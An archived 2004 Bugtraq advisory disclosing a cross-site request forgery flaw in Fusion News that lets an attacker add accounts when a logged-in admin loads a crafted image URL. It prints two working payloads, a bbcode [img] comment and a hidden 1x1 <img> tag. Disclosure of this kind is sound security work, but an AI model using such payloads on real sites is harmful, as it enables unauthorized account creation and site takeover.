lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040729225224.24449.qmail@www.securityfocus.com>
Date: 29 Jul 2004 22:52:24 -0000
From: Joseph Moniz <r3d_5pik3@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Fusion News Yet Another Unauthorized Account Addition Vulnerability




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY patching the previous similar exploit. Basicly all the vendor did to stop the last vulnrability was make it so you had to be signd on as an admin to creat an account, and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnrability this one you cant simply type something into the url bar and press enter. All you have to do is make sure the admin is logged on then do one of the following. (the first is probably the most reliable for an attacker)
1.)Leave them a comment with an [img] bbcode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]

2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By convincing him to go to a site that has a malicious <img> tag such as the following

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">

That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ